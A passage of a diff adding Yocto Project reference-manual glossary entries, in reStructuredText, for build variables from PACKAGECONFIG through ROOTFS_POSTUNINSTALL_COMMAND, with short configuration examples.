+ three arguments that determine the feature's behavior.
+ ::
+
+ PACKAGECONFIG[gtk] = "--with-gtk3,--without-gtk3,gtk+3"
+
+ The
+ ``--with-gtk3`` and ``gtk+3`` arguments apply only if the feature is
+ enabled. In this case, ``--with-gtk3`` is added to the configure
+ script argument list and ``gtk+3`` is added to ``DEPENDS``. On the
+ other hand, if the feature is disabled say through a ``.bbappend``
+ file in another layer, then the second argument ``--without-gtk3`` is
+ added to the configure script instead.
+
+ The basic ``PACKAGECONFIG`` structure previously described holds true
+ regardless of whether you are creating a block or changing a block.
+ When creating a block, use the structure inside your recipe.
+
+ If you want to change an existing ``PACKAGECONFIG`` block, you can do
+ so one of two ways:
+
+ - *Append file:* Create an append file named
+ recipename\ ``.bbappend`` in your layer and override the value of
+ ``PACKAGECONFIG``. You can either completely override the
+ variable:
+ ::
+
+ PACKAGECONFIG = "f4 f5"
+
+ Or, you can just append the variable:
+ ::
+
+ PACKAGECONFIG_append = " f4"
+
+ - *Configuration file:* This method is identical to changing the
+ block through an append file except you edit your ``local.conf``
+ or ``mydistro.conf`` file. As with append files previously
+ described, you can either completely override the variable:
+ ::
+
+ PACKAGECONFIG_pn-recipename = "f4 f5"
+
+ Or, you can just amend the variable:
+ ::
+
+ PACKAGECONFIG_append_pn-recipename = " f4"
+
+ :term:`PACKAGECONFIG_CONFARGS`
+ A space-separated list of configuration options generated from the
+ :term:`PACKAGECONFIG` setting.
+
+ Classes such as :ref:`autotools <ref-classes-autotools>` and
+ :ref:`cmake <ref-classes-cmake>` use ``PACKAGECONFIG_CONFARGS`` to
+ pass ``PACKAGECONFIG`` options to ``configure`` and ``cmake``,
+ respectively. If you are using ``PACKAGECONFIG`` but not a class that
+ handles the ``do_configure`` task, then you need to use
+ ``PACKAGECONFIG_CONFARGS`` appropriately.
+
+ :term:`PACKAGEGROUP_DISABLE_COMPLEMENTARY`
+ For recipes inheriting the
+ :ref:`packagegroup <ref-classes-packagegroup>` class, setting
+ ``PACKAGEGROUP_DISABLE_COMPLEMENTARY`` to "1" specifies that the
+ normal complementary packages (i.e. ``-dev``, ``-dbg``, and so forth)
+ should not be automatically created by the ``packagegroup`` recipe,
+ which is the default behavior.
+
+ :term:`PACKAGES`
+ The list of packages the recipe creates. The default value is the
+ following:
+ ::
+
+ ${PN}-dbg ${PN}-staticdev ${PN}-dev ${PN}-doc ${PN}-locale ${PACKAGE_BEFORE_PN} ${PN}
+
+ During packaging, the :ref:`ref-tasks-package` task
+ goes through ``PACKAGES`` and uses the :term:`FILES`
+ variable corresponding to each package to assign files to the
+ package. If a file matches the ``FILES`` variable for more than one
+ package in ``PACKAGES``, it will be assigned to the earliest
+ (leftmost) package.
+
+ Packages in the variable's list that are empty (i.e. where none of
+ the patterns in ``FILES_``\ pkg match any files installed by the
+ :ref:`ref-tasks-install` task) are not generated,
+ unless generation is forced through the
+ :term:`ALLOW_EMPTY` variable.
+
+ :term:`PACKAGES_DYNAMIC`
+ A promise that your recipe satisfies runtime dependencies for
+ optional modules that are found in other recipes.
+ ``PACKAGES_DYNAMIC`` does not actually satisfy the dependencies, it
+ only states that they should be satisfied. For example, if a hard,
+ runtime dependency (:term:`RDEPENDS`) of another
+ package is satisfied at build time through the ``PACKAGES_DYNAMIC``
+ variable, but a package with the module name is never actually
+ produced, then the other package will be broken. Thus, if you attempt
+ to include that package in an image, you will get a dependency
+ failure from the packaging system during the
+ :ref:`ref-tasks-rootfs` task.
+
+ Typically, if there is a chance that such a situation can occur and
+ the package that is not created is valid without the dependency being
+ satisfied, then you should use :term:`RRECOMMENDS`
+ (a soft runtime dependency) instead of ``RDEPENDS``.
+
+ For an example of how to use the ``PACKAGES_DYNAMIC`` variable when
+ you are splitting packages, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:handling optional module packaging`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`PACKAGESPLITFUNCS`
+ Specifies a list of functions run to perform additional splitting of
+ files into individual packages. Recipes can either prepend to this
+ variable or prepend to the ``populate_packages`` function in order to
+ perform additional package splitting. In either case, the function
+ should set :term:`PACKAGES`,
+ :term:`FILES`, :term:`RDEPENDS` and
+ other packaging variables appropriately in order to perform the
+ desired splitting.
+
+ :term:`PARALLEL_MAKE`
+ Extra options passed to the ``make`` command during the
+ :ref:`ref-tasks-compile` task in order to specify
+ parallel compilation on the local build host. This variable is
+ usually in the form "-j x", where x represents the maximum number of
+ parallel threads ``make`` can run.
+
+ .. note::
+
+ In order for ``PARALLEL_MAKE`` to be effective, ``make`` must be
+ called with ``${``\ :term:`EXTRA_OEMAKE`\ ``}``. An easy way to ensure
+ this is to use the ``oe_runmake`` function.
+
+ By default, the OpenEmbedded build system automatically sets this
+ variable to be equal to the number of cores the build system uses.
+
+ .. note::
+
+ If the software being built experiences dependency issues during
+ the ``do_compile`` task that result in race conditions, you can clear
+ the ``PARALLEL_MAKE`` variable within the recipe as a workaround. For
+ information on addressing race conditions, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:debugging parallel make races`"
+ section in the Yocto Project Development Tasks Manual.
+
+ For single socket systems (i.e. one CPU), you should not have to
+ override this variable to gain optimal parallelism during builds.
+ However, if you have very large systems that employ multiple physical
+ CPUs, you might want to make sure the ``PARALLEL_MAKE`` variable is
+ not set higher than "-j 20".
+
+ For more information on speeding up builds, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:speeding up a build`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`PARALLEL_MAKEINST`
+ Extra options passed to the ``make install`` command during the
+ :ref:`ref-tasks-install` task in order to specify
+ parallel installation. This variable defaults to the value of
+ :term:`PARALLEL_MAKE`.
+
+ .. note::
+
+ In order for ``PARALLEL_MAKEINST`` to be effective, ``make`` must
+ be called with
+ ``${``\ :term:`EXTRA_OEMAKE`\ ``}``. An easy
+ way to ensure this is to use the ``oe_runmake`` function.
+
+ If the software being built experiences dependency issues during
+ the ``do_install`` task that result in race conditions, you can
+ clear the ``PARALLEL_MAKEINST`` variable within the recipe as a
+ workaround. For information on addressing race conditions, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:debugging parallel make races`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`PATCHRESOLVE`
+ Determines the action to take when a patch fails. You can set this
+ variable to one of two values: "noop" and "user".
+
+ The default value of "noop" causes the build to simply fail when the
+ OpenEmbedded build system cannot successfully apply a patch. Setting
+ the value to "user" causes the build system to launch a shell and
+ places you in the right location so that you can manually resolve the
+ conflicts.
+
+ Set this variable in your ``local.conf`` file.
+
+ :term:`PATCHTOOL`
+ Specifies the utility used to apply patches for a recipe during the
+ :ref:`ref-tasks-patch` task. You can specify one of
+ three utilities: "patch", "quilt", or "git". The default utility used
+ is "quilt" except for the quilt-native recipe itself. Because the
+ quilt tool is not available at the time quilt-native is being
+ patched, it uses "patch".
+
+ If you wish to use an alternative patching tool, set the variable in
+ the recipe using one of the following:
+ ::
+
+ PATCHTOOL = "patch"
+ PATCHTOOL = "quilt"
+ PATCHTOOL = "git"
+
+ :term:`PE`
+ The epoch of the recipe. By default, this variable is unset. The
+ variable is used to make upgrades possible when the versioning scheme
+ changes in some backwards incompatible way.
+
+ ``PE`` is the default value of the :term:`PKGE` variable.
+
+ :term:`PF`
+ Specifies the recipe or package name and includes all version and
+ revision numbers (i.e. ``glibc-2.13-r20+svnr15508/`` and
+ ``bash-4.2-r1/``). This variable is comprised of the following:
+ ${:term:`PN`}-${:term:`EXTENDPE`}${:term:`PV`}-${:term:`PR`}
+
+ :term:`PIXBUF_PACKAGES`
+ When inheriting the :ref:`pixbufcache <ref-classes-pixbufcache>`
+ class, this variable identifies packages that contain the pixbuf
+ loaders used with ``gdk-pixbuf``. By default, the ``pixbufcache``
+ class assumes that the loaders are in the recipe's main package (i.e.
+ ``${``\ :term:`PN`\ ``}``). Use this variable if the
+ loaders you need are in a package other than that main package.
+
+ :term:`PKG`
+ The name of the resulting package created by the OpenEmbedded build
+ system.
+
+ .. note::
+
+ When using the ``PKG`` variable, you must use a package name override.
+
+ For example, when the :ref:`debian <ref-classes-debian>` class
+ renames the output package, it does so by setting
+ ``PKG_packagename``.
+
+ :term:`PKG_CONFIG_PATH`
+ The path to ``pkg-config`` files for the current build context.
+ ``pkg-config`` reads this variable from the environment.
+
+ :term:`PKGD`
+ Points to the destination directory for files to be packaged before
+ they are split into individual packages. This directory defaults to
+ the following:
+ ::
+
+ ${WORKDIR}/package
+
+ Do not change this default.
+
+ :term:`PKGDATA_DIR`
+ Points to a shared, global-state directory that holds data generated
+ during the packaging process. During the packaging process, the
+ :ref:`ref-tasks-packagedata` task packages data
+ for each recipe and installs it into this temporary, shared area.
+ This directory defaults to the following, which you should not
+ change:
+ ::
+
+ ${STAGING_DIR_HOST}/pkgdata
+
+ For examples of how this data is used, see the
+ ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+ section in the Yocto Project Overview and Concepts Manual and the
+ ":ref:`dev-manual/dev-manual-common-tasks:viewing package information with \`\`oe-pkgdata-util\`\``"
+ section in the Yocto Project Development Tasks Manual. For more
+ information on the shared, global-state directory, see
+ :term:`STAGING_DIR_HOST`.
+
+ :term:`PKGDEST`
+ Points to the parent directory for files to be packaged after they
+ have been split into individual packages. This directory defaults to
+ the following:
+ ::
+
+ ${WORKDIR}/packages-split
+
+ Under this directory, the build system creates directories for each
+ package specified in :term:`PACKAGES`. Do not change
+ this default.
+
+ :term:`PKGDESTWORK`
+ Points to a temporary work area where the
+ :ref:`ref-tasks-package` task saves package metadata.
+ The ``PKGDESTWORK`` location defaults to the following:
+ ::
+
+ ${WORKDIR}/pkgdata
+
+ Do not change this default.
+
+ The :ref:`ref-tasks-packagedata` task copies the
+ package metadata from ``PKGDESTWORK`` to
+ :term:`PKGDATA_DIR` to make it available globally.
+
+ :term:`PKGE`
+ The epoch of the package(s) built by the recipe. By default, ``PKGE``
+ is set to :term:`PE`.
+
+ :term:`PKGR`
+ The revision of the package(s) built by the recipe. By default,
+ ``PKGR`` is set to :term:`PR`.
+
+ :term:`PKGV`
+ The version of the package(s) built by the recipe. By default,
+ ``PKGV`` is set to :term:`PV`.
+
+ :term:`PN`
+ This variable can have two separate functions depending on the
+ context: a recipe name or a resulting package name.
+
+ ``PN`` refers to a recipe name in the context of a file used by the
+ OpenEmbedded build system as input to create a package. The name is
+ normally extracted from the recipe file name. For example, if the
+ recipe is named ``expat_2.0.1.bb``, then the default value of ``PN``
+ will be "expat".
+
+ The variable refers to a package name in the context of a file
+ created or produced by the OpenEmbedded build system.
+
+ If applicable, the ``PN`` variable also contains any special suffix
+ or prefix. For example, using ``bash`` to build packages for the
+ native machine, ``PN`` is ``bash-native``. Using ``bash`` to build
+ packages for the target and for Multilib, ``PN`` would be ``bash``
+ and ``lib64-bash``, respectively.
+
+ :term:`PNBLACKLIST`
+ Lists recipes you do not want the OpenEmbedded build system to build.
+ This variable works in conjunction with the
+ :ref:`blacklist <ref-classes-blacklist>` class, which is inherited
+ globally.
+
+ To prevent a recipe from being built, use the ``PNBLACKLIST``
+ variable in your ``local.conf`` file. Here is an example that
+ prevents ``myrecipe`` from being built:
+ ::
+
+ PNBLACKLIST[myrecipe] = "Not supported by our organization."
+
+ :term:`POPULATE_SDK_POST_HOST_COMMAND`
+ Specifies a list of functions to call once the OpenEmbedded build
+ system has created the host part of the SDK. You can specify
+ functions separated by semicolons:
+ ::
+
+ POPULATE_SDK_POST_HOST_COMMAND += "function; ... "
+
+ If you need to pass the SDK path to a command within a function, you
+ can use ``${SDK_DIR}``, which points to the parent directory used by
+ the OpenEmbedded build system when creating SDK output. See the
+ :term:`SDK_DIR` variable for more information.
+
+ :term:`POPULATE_SDK_POST_TARGET_COMMAND`
+ Specifies a list of functions to call once the OpenEmbedded build
+ system has created the target part of the SDK. You can specify
+ functions separated by semicolons:
+ ::
+
+ POPULATE_SDK_POST_TARGET_COMMAND += "function; ... "
+
+ If you need to pass the SDK path to a command within a function, you
+ can use ``${SDK_DIR}``, which points to the parent directory used by
+ the OpenEmbedded build system when creating SDK output. See the
+ :term:`SDK_DIR` variable for more information.
+
+ :term:`PR`
+ The revision of the recipe. The default value for this variable is
+ "r0". Subsequent revisions of the recipe conventionally have the
+ values "r1", "r2", and so forth. When :term:`PV` increases,
+ ``PR`` is conventionally reset to "r0".
+
+ .. note::
+
+ The OpenEmbedded build system does not need the aid of ``PR``
+ to know when to rebuild a recipe. The build system uses the task
+ :ref:`input checksums <overview-checksums>` along with the
+ :ref:`stamp <structure-build-tmp-stamps>` and
+ :ref:`overview-manual/overview-manual-concepts:shared state cache`
+ mechanisms.
+
+ The ``PR`` variable primarily becomes significant when a package
+ manager dynamically installs packages on an already built image. In
+ this case, ``PR``, which is the default value of
+ :term:`PKGR`, helps the package manager distinguish which
+ package is the most recent one in cases where many packages have the
+ same ``PV`` (i.e. ``PKGV``). A component having many packages with
+ the same ``PV`` usually means that the packages all install the same
+ upstream version, but with later (``PR``) version packages including
+ packaging fixes.
+
+ .. note::
+
+ ``PR`` does not need to be increased for changes that do not change the
+ package contents or metadata.
+
+ Because manually managing ``PR`` can be cumbersome and error-prone,
+ an automated solution exists. See the
+ ":ref:`dev-manual/dev-manual-common-tasks:working with a pr service`" section
+ in the Yocto Project Development Tasks Manual for more information.
+
+ :term:`PREFERRED_PROVIDER`
+ If multiple recipes provide the same item, this variable determines
+ which recipe is preferred and thus provides the item (i.e. the
+ preferred provider). You should always suffix this variable with the
+ name of the provided item. And, you should define the variable using
+ the preferred recipe's name (:term:`PN`). Here is a common
+ example:
+ ::
+
+ PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+
+ In the previous example, multiple recipes are providing "virtual/kernel".
+ The ``PREFERRED_PROVIDER`` variable is set with the name (``PN``) of
+ the recipe you prefer to provide "virtual/kernel".
+
+ Following are more examples:
+ ::
+
+ PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
+ PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
+
+ For more
+ information, see the ":ref:`metadata-virtual-providers`"
+ section in the Yocto Project Development Tasks Manual.
+
+ .. note::
+
+ If you use a ``virtual/\*`` item with ``PREFERRED_PROVIDER``, then any
+ recipe that :term:`PROVIDES` that item but is not selected (defined)
+ by ``PREFERRED_PROVIDER`` is prevented from building, which is usually
+ desirable since this mechanism is designed to select between mutually
+ exclusive alternative providers.
+
+ :term:`PREFERRED_VERSION`
+ If multiple versions of recipes exist, this variable determines which
+ version is given preference. You must always suffix the variable with
+ the :term:`PN` you want to select, and you should set the
+ :term:`PV` accordingly for precedence.
+
+ The ``PREFERRED_VERSION`` variable supports limited wildcard use
+ through the "``%``" character. You can use the character to match any
+ number of characters, which can be useful when specifying versions
+ that contain long revision numbers that potentially change. Here are
+ two examples:
+ ::
+
+ PREFERRED_VERSION_python = "3.4.0"
+ PREFERRED_VERSION_linux-yocto = "5.0%"
+
+ .. note::
+
+ The use of the "%" character is limited in that it only works at the end of the
+ string. You cannot use the wildcard character in any other
+ location of the string.
+
+ The specified version is matched against :term:`PV`, which
+ does not necessarily match the version part of the recipe's filename.
+ For example, consider two recipes ``foo_1.2.bb`` and ``foo_git.bb``
+ where ``foo_git.bb`` contains the following assignment:
+ ::
+
+ PV = "1.1+git${SRCPV}"
+
+ In this case, the correct way to select
+ ``foo_git.bb`` is by using an assignment such as the following:
+ ::
+
+ PREFERRED_VERSION_foo = "1.1+git%"
+
+ Compare that previous example
+ against the following incorrect example, which does not work:
+ ::
+
+ PREFERRED_VERSION_foo = "git"
+
+ Sometimes the ``PREFERRED_VERSION`` variable can be set by
+ configuration files in a way that is hard to change. You can use
+ :term:`OVERRIDES` to set a machine-specific
+ override. Here is an example:
+ ::
+
+ PREFERRED_VERSION_linux-yocto_qemux86 = "5.0%"
+
+ Although not recommended, worst case, you can also use the
+ "forcevariable" override, which is the strongest override possible.
+ Here is an example:
+ ::
+
+ PREFERRED_VERSION_linux-yocto_forcevariable = "5.0%"
+
+ .. note::
+
+ The ``\_forcevariable`` override is not handled specially. This override
+ only works because the default value of ``OVERRIDES`` includes "forcevariable".
+
+ :term:`PREMIRRORS`
+ Specifies additional paths from which the OpenEmbedded build system
+ gets source code. When the build system searches for source code, it
+ first tries the local download directory. If that location fails, the
+ build system tries locations defined by ``PREMIRRORS``, the upstream
+ source, and then locations specified by
+ :term:`MIRRORS` in that order.
+
+ Assuming your distribution (:term:`DISTRO`) is "poky",
+ the default value for ``PREMIRRORS`` is defined in the
+ ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository.
+
+ Typically, you could add a specific server for the build system to
+ attempt before any others by adding something like the following to
+ the ``local.conf`` configuration file in the
+ :term:`Build Directory`:
+ ::
+
+ PREMIRRORS_prepend = "\
+ git://.*/.* http://www.yoctoproject.org/sources/ \n \
+ ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+ http://.*/.* http://www.yoctoproject.org/sources/ \n \
+ https://.*/.* http://www.yoctoproject.org/sources/ \n"
+
+ These changes cause the
+ build system to intercept Git, FTP, HTTP, and HTTPS requests and
+ direct them to the ``http://`` sources mirror. You can use
+ ``file://`` URLs to point to local directories or network shares as
+ well.
+
+ :term:`PRIORITY`
+ Indicates the importance of a package.
+
+ ``PRIORITY`` is considered to be part of the distribution policy
+ because the importance of any given recipe depends on the purpose for
+ which the distribution is being produced. Thus, ``PRIORITY`` is not
+ normally set within recipes.
+
+ You can set ``PRIORITY`` to "required", "standard", "extra", and
+ "optional", which is the default.
+
+ :term:`PRIVATE_LIBS`
+ Specifies libraries installed within a recipe that should be ignored
+ by the OpenEmbedded build system's shared library resolver. This
+ variable is typically used when software being built by a recipe has
+ its own private versions of a library normally provided by another
+ recipe. In this case, you would not want the package containing the
+ private libraries to be set as a dependency on other unrelated
+ packages that should instead depend on the package providing the
+ standard version of the library.
+
+ Libraries specified in this variable should be specified by their
+ file name. For example, from the Firefox recipe in meta-browser:
+ ::
+
+ PRIVATE_LIBS = "libmozjs.so \
+ libxpcom.so \
+ libnspr4.so \
+ libxul.so \
+ libmozalloc.so \
+ libplc4.so \
+ libplds4.so"
+
+ For more information, see the
+ ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+ :term:`PROVIDES`
+ A list of aliases by which a particular recipe can be known. By
+ default, a recipe's own ``PN`` is implicitly already in its
+ ``PROVIDES`` list and therefore does not need to mention that it
+ provides itself. If a recipe uses ``PROVIDES``, the additional
+ aliases are synonyms for the recipe and can be useful for satisfying
+ dependencies of other recipes during the build as specified by
+ ``DEPENDS``.
+
+ Consider the following example ``PROVIDES`` statement from the recipe
+ file ``eudev_3.2.9.bb``:
+ ::
+
+ PROVIDES = "udev"
+
+ The ``PROVIDES`` statement
+ results in the "eudev" recipe also being available as simply "udev".
+
+ .. note::
+
+ Given that a recipe's own recipe name is already implicitly in its
+ own PROVIDES list, it is unnecessary to add aliases with the "+=" operator;
+ using a simple assignment will be sufficient. In other words,
+ while you could write:
+ ::
+
+ PROVIDES += "udev"
+
+
+ in the above, the "+=" is overkill and unnecessary.
+
+ In addition to providing recipes under alternate names, the
+ ``PROVIDES`` mechanism is also used to implement virtual targets. A
+ virtual target is a name that corresponds to some particular
+ functionality (e.g. a Linux kernel). Recipes that provide the
+ functionality in question list the virtual target in ``PROVIDES``.
+ Recipes that depend on the functionality in question can include the
+ virtual target in ``DEPENDS`` to leave the choice of provider open.
+
+ Conventionally, virtual targets have names on the form
+ "virtual/function" (e.g. "virtual/kernel"). The slash is simply part
+ of the name and has no syntactical significance.
+
+ The :term:`PREFERRED_PROVIDER` variable is
+ used to select which particular recipe provides a virtual target.
+
+ .. note::
+
+ A corresponding mechanism for virtual runtime dependencies
+ (packages) exists. However, the mechanism does not depend on any
+ special functionality beyond ordinary variable assignments. For
+ example, ``VIRTUAL-RUNTIME_dev_manager`` refers to the package of
+ the component that manages the ``/dev`` directory.
+
+ Setting the "preferred provider" for runtime dependencies is as
+ simple as using the following assignment in a configuration file:
+ ::
+
+ VIRTUAL-RUNTIME_dev_manager = "udev"
+
+
+ :term:`PRSERV_HOST`
+ The network based :term:`PR` service host and port.
+
+ The ``conf/local.conf.sample.extended`` configuration file in the
+ :term:`Source Directory` shows how the
+ ``PRSERV_HOST`` variable is set:
+ ::
+
+ PRSERV_HOST = "localhost:0"
+
+ You must
+ set the variable if you want to automatically start a local :ref:`PR
+ service <dev-manual/dev-manual-common-tasks:working with a pr service>`. You can
+ set ``PRSERV_HOST`` to other values to use a remote PR service.
+
+ :term:`PTEST_ENABLED`
+ Specifies whether or not :ref:`Package
+ Test <dev-manual/dev-manual-common-tasks:testing packages with ptest>` (ptest)
+ functionality is enabled when building a recipe. You should not set
+ this variable directly. Enabling and disabling building Package Tests
+ at build time should be done by adding "ptest" to (or removing it
+ from) :term:`DISTRO_FEATURES`.
+
+ :term:`PV`
+ The version of the recipe. The version is normally extracted from the
+ recipe filename. For example, if the recipe is named
+ ``expat_2.0.1.bb``, then the default value of ``PV`` will be "2.0.1".
+ ``PV`` is generally not overridden within a recipe unless it is
+ building an unstable (i.e. development) version from a source code
+ repository (e.g. Git or Subversion).
+
+ ``PV`` is the default value of the :term:`PKGV` variable.
+
+ :term:`PYTHON_ABI`
+ When used by recipes that inherit the
+ :ref:`distutils3 <ref-classes-distutils3>`,
+ :ref:`setuptools3 <ref-classes-setuptools3>`,
+ :ref:`distutils <ref-classes-distutils>`, or
+ :ref:`setuptools <ref-classes-setuptools>` classes, denotes the
+ Application Binary Interface (ABI) currently in use for Python. By
+ default, the ABI is "m". You do not have to set this variable as the
+ OpenEmbedded build system sets it for you.
+
+ The OpenEmbedded build system uses the ABI to construct directory
+ names used when installing the Python headers and libraries in
+ sysroot (e.g. ``.../python3.3m/...``).
+
+ Recipes that inherit the ``distutils`` class during cross-builds also
+ use this variable to locate the headers and libraries of the
+ appropriate Python that the extension is targeting.
+
+ :term:`PYTHON_PN`
+ When used by recipes that inherit the
+ `distutils3 <ref-classes-distutils3>`,
+ :ref:`setuptools3 <ref-classes-setuptools3>`,
+ :ref:`distutils <ref-classes-distutils>`, or
+ :ref:`setuptools <ref-classes-setuptools>` classes, specifies the
+ major Python version being built. For Python 3.x, ``PYTHON_PN`` would
+ be "python3". You do not have to set this variable as the
+ OpenEmbedded build system automatically sets it for you.
+
+ The variable allows recipes to use common infrastructure such as the
+ following:
+ ::
+
+ DEPENDS += "${PYTHON_PN}-native"
+
+ In the previous example,
+ the version of the dependency is ``PYTHON_PN``.
+
+ :term:`RANLIB`
+ The minimal command and arguments to run ``ranlib``.
+
+ :term:`RCONFLICTS`
+ The list of packages that conflict with packages. Note that packages
+ will not be installed if conflicting packages are not first removed.
+
+ Like all package-controlling variables, you must always use them in
+ conjunction with a package name override. Here is an example:
+ ::
+
+ RCONFLICTS_${PN} = "another_conflicting_package_name"
+
+ BitBake, which the OpenEmbedded build system uses, supports
+ specifying versioned dependencies. Although the syntax varies
+ depending on the packaging format, BitBake hides these differences
+ from you. Here is the general syntax to specify versions with the
+ ``RCONFLICTS`` variable:
+ ::
+
+ RCONFLICTS_${PN} = "package (operator version)"
+
+ For ``operator``, you can specify the following:
+
+ - =
+ - <
+ - >
+ - <=
+ - >=
+
+ For example, the following sets up a dependency on version 1.2 or
+ greater of the package ``foo``:
+ ::
+
+ RCONFLICTS_${PN} = "foo (>= 1.2)"
+
+ :term:`RDEPENDS`
+ Lists runtime dependencies of a package. These dependencies are other
+ packages that must be installed in order for the package to function
+ correctly. As an example, the following assignment declares that the
+ package ``foo`` needs the packages ``bar`` and ``baz`` to be
+ installed:
+ ::
+
+ RDEPENDS_foo = "bar baz"
+
+ The most common types of package
+ runtime dependencies are automatically detected and added. Therefore,
+ most recipes do not need to set ``RDEPENDS``. For more information,
+ see the
+ ":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+ The practical effect of the above ``RDEPENDS`` assignment is that
+ ``bar`` and ``baz`` will be declared as dependencies inside the
+ package ``foo`` when it is written out by one of the
+ :ref:`do_package_write_\* <ref-tasks-package_write_deb>` tasks.
+ Exactly how this is done depends on which package format is used,
+ which is determined by
+ :term:`PACKAGE_CLASSES`. When the
+ corresponding package manager installs the package, it will know to
+ also install the packages on which it depends.
+
+ To ensure that the packages ``bar`` and ``baz`` get built, the
+ previous ``RDEPENDS`` assignment also causes a task dependency to be
+ added. This dependency is from the recipe's
+ :ref:`ref-tasks-build` (not to be confused with
+ :ref:`ref-tasks-compile`) task to the
+ ``do_package_write_*`` task of the recipes that build ``bar`` and
+ ``baz``.
+
+ The names of the packages you list within ``RDEPENDS`` must be the
+ names of other packages - they cannot be recipe names. Although
+ package names and recipe names usually match, the important point
+ here is that you are providing package names within the ``RDEPENDS``
+ variable. For an example of the default list of packages created from
+ a recipe, see the :term:`PACKAGES` variable.
+
+ Because the ``RDEPENDS`` variable applies to packages being built,
+ you should always use the variable in a form with an attached package
+ name (remember that a single recipe can build multiple packages). For
+ example, suppose you are building a development package that depends
+ on the ``perl`` package. In this case, you would use the following
+ ``RDEPENDS`` statement:
+ ::
+
+ RDEPENDS_${PN}-dev += "perl"
+
+ In the example,
+ the development package depends on the ``perl`` package. Thus, the
+ ``RDEPENDS`` variable has the ``${PN}-dev`` package name as part of
+ the variable.
+
+ .. note::
+
+ ``RDEPENDS_${PN}-dev`` includes ``${``\ :term:`PN`\ ``}``
+ by default. This default is set in the BitBake configuration file
+ (``meta/conf/bitbake.conf``). Be careful not to accidentally remove
+ ``${PN}`` when modifying ``RDEPENDS_${PN}-dev``. Use the "+=" operator
+ rather than the "=" operator.
+
+ The package names you use with ``RDEPENDS`` must appear as they would
+ in the ``PACKAGES`` variable. The :term:`PKG` variable
+ allows a different name to be used for the final package (e.g. the
+ :ref:`debian <ref-classes-debian>` class uses this to rename
+ packages), but this final package name cannot be used with
+ ``RDEPENDS``, which makes sense as ``RDEPENDS`` is meant to be
+ independent of the package format used.
+
+ BitBake, which the OpenEmbedded build system uses, supports
+ specifying versioned dependencies. Although the syntax varies
+ depending on the packaging format, BitBake hides these differences
+ from you. Here is the general syntax to specify versions with the
+ ``RDEPENDS`` variable:
+ ::
+
+ RDEPENDS_${PN} = "package (operator version)"
+
+ For ``operator``, you can specify the following:
+
+ - =
+ - <
+ - >
+ - <=
+ - >=
+
+ For version, provide the version number.
+
+ .. note::
+
+ You can use ``EXTENDPKGV`` to provide a full package version
+ specification.
+
+ For example, the following sets up a dependency on version 1.2 or
+ greater of the package ``foo``:
+ ::
+
+ RDEPENDS_${PN} = "foo (>= 1.2)"
+
+ For information on build-time dependencies, see the
+ :term:`DEPENDS` variable. You can also see the
+ ":ref:`Tasks <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:tasks>`" and
+ ":ref:`Dependencies <bitbake:bitbake-user-manual/bitbake-user-manual-execution:dependencies>`" sections in the
+ BitBake User Manual for additional information on tasks and
+ dependencies.
+
+ :term:`REQUIRED_DISTRO_FEATURES`
+ When inheriting the
+ :ref:`features_check <ref-classes-features_check>`
+ class, this variable identifies distribution features that must exist
+ in the current configuration in order for the OpenEmbedded build
+ system to build the recipe. In other words, if the
+ ``REQUIRED_DISTRO_FEATURES`` variable lists a feature that does not
+ appear in ``DISTRO_FEATURES`` within the current configuration, then
+ the recipe will be skipped, and if the build system attempts to build
+ the recipe then an error will be triggered.
+
+ :term:`RM_WORK_EXCLUDE`
+ With ``rm_work`` enabled, this variable specifies a list of recipes
+ whose work directories should not be removed. See the
+ ":ref:`rm_work.bbclass <ref-classes-rm-work>`" section for more
+ details.
+
+ :term:`ROOT_HOME`
+ Defines the root home directory. By default, this directory is set as
+ follows in the BitBake configuration file:
+ ::
+
+ ROOT_HOME ??= "/home/root"
+
+ .. note::
+
+ This default value is likely used because some embedded solutions
+ prefer to have a read-only root filesystem and prefer to keep
+ writeable data in one place.
+
+ You can override the default by setting the variable in any layer or
+ in the ``local.conf`` file. Because the default is set using a "weak"
+ assignment (i.e. "??="), you can use either of the following forms to
+ define your override:
+ ::
+
+ ROOT_HOME = "/root"
+ ROOT_HOME ?= "/root"
+
+ These
+ override examples use ``/root``, which is probably the most commonly
+ used override.
+
+ :term:`ROOTFS`
+ Indicates a filesystem image to include as the root filesystem.
+
+ The ``ROOTFS`` variable is an optional variable used with the
+ :ref:`image-live <ref-classes-image-live>` class.
+
+ :term:`ROOTFS_POSTINSTALL_COMMAND`
+ Specifies a list of functions to call after the OpenEmbedded build
+ system has installed packages. You can specify functions separated by
+ semicolons:
+ ::
+
+ ROOTFS_POSTINSTALL_COMMAND += "function; ... "
+
+ If you need to pass the root filesystem path to a command within a
+ function, you can use ``${IMAGE_ROOTFS}``, which points to the
+ directory that becomes the root filesystem image. See the
+ :term:`IMAGE_ROOTFS` variable for more
+ information.
+
+ :term:`ROOTFS_POSTPROCESS_COMMAND`
+ Specifies a list of functions to call once the OpenEmbedded build
+ system has created the root filesystem. You can specify functions
+ separated by semicolons:
+ ::
+
+ ROOTFS_POSTPROCESS_COMMAND += "function; ... "
+
+ If you need to pass the root filesystem path to a command within a
+ function, you can use ``${IMAGE_ROOTFS}``, which points to the
+ directory that becomes the root filesystem image. See the
+ :term:`IMAGE_ROOTFS` variable for more
+ information.
+
+ :term:`ROOTFS_POSTUNINSTALL_COMMAND`
+ Specifies a list of functions to call after the OpenEmbedded build
+ system has removed unnecessary packages. When runtime package
+ management is disabled in the image, several packages are removed
+ including ``base-passwd``, ``shadow``, and ``update-alternatives``.
+ You can specify functions separated by semicolons:
+ ::
+
+ ROOTFS_POSTUNINSTALL_COMMAND += "function; ... "
+
+ If you need to pass the root filesystem path to a command within a
